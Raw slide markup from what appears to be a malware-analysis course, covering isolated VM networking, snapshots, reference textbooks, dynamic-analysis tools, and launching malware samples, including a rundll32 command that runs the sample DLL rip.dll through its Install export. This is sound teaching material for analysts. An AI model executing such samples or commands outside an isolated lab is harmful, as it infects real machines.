              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="971600" y="3356992"/>
                <a:ext cx="165618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Physical Machine</a:t>
                </a:r>
                <a:endParaRPr sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="512" name="Google Shape;512;p48"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1907706" y="3829689"/>
                <a:ext cx="432048" cy="288032"/>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lt1"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Calibri"/>
                    <a:sym typeface="Calibri"/>
                  </a:rPr>
                  <a:t>NIC</a:t>
                </a:r>
                <a:endParaRPr sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="513" name="Google Shape;513;p48"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="512" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2339754" y="3973705"/>
                <a:ext cx="576000" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln cap="flat" cmpd="sng" w="9525">
                <a:solidFill>
                  <a:srgbClr val="4A7DBA"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd len="sm" w="sm" type="none"/>
                <a:tailEnd len="sm" w="sm" type="none"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="514" name="Google Shape;514;p48"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="971600" y="5661248"/>
              <a:ext cx="1656184" cy="792088"/>
              <a:chOff x="971600" y="1916832"/>
              <a:chExt cx="1656184" cy="792088"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="515" name="Google Shape;515;p48"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1043608" y="1916832"/>
                <a:ext cx="1296144" cy="792088"/>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6" name="Google Shape;516;p48"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="971600" y="1948191"/>
                <a:ext cx="165618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Virtual Machine</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
              <a:p>
                <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" sz="1400">
                    <a:solidFill>
                      <a:schemeClr val="dk1"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Calibri"/>
                    <a:sym typeface="Calibri"/>
                  </a:rPr>
                  <a:t>Analysis</a:t>
                </a:r>
                <a:endParaRPr sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="517" name="Google Shape;517;p48"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1907706" y="2420888"/>
                <a:ext cx="432048" cy="288032"/>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200">
                    <a:solidFill>
                      <a:schemeClr val="lt1"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Calibri"/>
                    <a:sym typeface="Calibri"/>
                  </a:rPr>
                  <a:t>NIC</a:t>
                </a:r>
                <a:endParaRPr sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="518" name="Google Shape;518;p48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3347864" y="5420851"/>
              <a:ext cx="864098" cy="53236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VMNet</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="519" name="Google Shape;519;p48"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="518" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2339864" y="5155133"/>
              <a:ext cx="1008000" cy="531900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="9525">
              <a:solidFill>
                <a:srgbClr val="4A7DBA"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="sm" w="sm" type="none"/>
              <a:tailEnd len="sm" w="sm" type="none"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="520" name="Google Shape;520;p48"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="517" idx="3"/>
              <a:endCxn id="518" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="2339754" y="5687120"/>
              <a:ext cx="1008000" cy="622200"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="9525">
              <a:solidFill>
                <a:srgbClr val="4A7DBA"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="sm" w="sm" type="none"/>
              <a:tailEnd len="sm" w="sm" type="none"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="521" name="Google Shape;521;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431542" y="1194528"/>
            <a:ext cx="6322786" cy="1586399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="25400">
            <a:solidFill>
              <a:srgbClr val="395E89"/>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2" name="Google Shape;522;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431542" y="3219146"/>
            <a:ext cx="4302477" cy="3522221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="25400">
            <a:solidFill>
              <a:srgbClr val="395E89"/>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3" name="Google Shape;523;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6660232" y="1770474"/>
            <a:ext cx="22322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Host-only Networking</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524" name="Google Shape;524;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6754328" y="3412672"/>
            <a:ext cx="214712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Custom Networking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="285750" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>VMNet0: Bridging</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="285750" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>VMNet8: NAT</a:t>
            </a:r>
            <a:endParaRPr sz="180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9"/>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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530" name="Google Shape;530;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1196752"/>
            <a:ext cx="3034680"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Snapshot</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>Restore points</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="531" name="Google Shape;531;p49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3542590" y="1700807"/>
            <a:ext cx="5507352" cy="453650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5"/>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Text-books</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Google Shape;124;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1196752"/>
            <a:ext cx="6767445"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latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>Michael Sikorski and Andrew Honig, “</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>Practical Malware Analysis: The Hands-on Guide to Dissecting Malicious Software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>”, No Starch Press, ISBN-10: 1-59327-290-1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Teko"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>Dennis Yurichev, “</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>Reverse Engineering for Beginners</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>”, 2013-2015.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Káº¿t quáº£ hÃ¬nh áº£nh cho Practical Malware Analysis: The Hands-on Guide to Dissecting Malicious" id="125" name="Google Shape;125;p5"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7224645" y="1124744"/>
            <a:ext cx="1835091" cy="2425824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="126" name="Google Shape;126;p5"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7221788" y="3874721"/>
            <a:ext cx="1823792" cy="2578615"/>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0"/>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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="537" name="Google Shape;537;p50"/>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Techniques and tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Sandbox: Cucco, Norman, GFI, Anubis, Joe, …</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Process Monitor/Explorer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Regshot </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ApateDNS, Netcat…</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>InetSim: Linux-based</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-107950" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-107950" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>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1"/>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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="Google Shape;543;p51"/>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Running Malware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Double-click: EXE, DLL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Apply </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>rundll32.exe</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Export arguments: by using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>PEview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> hoặc </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>PE Explorer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>E.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>rip.dll </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>(export : </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> và </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>Uninstall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>; ipr32x.dll  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>(export: </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>InstallService</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-107950" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="Google Shape;544;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1907704" y="2837885"/>
            <a:ext cx="5250155" cy="52322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2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>C:\rundll32.exe  </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>DLLname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>Export arguments</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Teko"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545" name="Google Shape;545;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2051720" y="5200847"/>
            <a:ext cx="4608512" cy="461665"/>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2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>C:\rundll32.exe  </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>rip.dll</a:t>
            </a:r>
            <a:r>
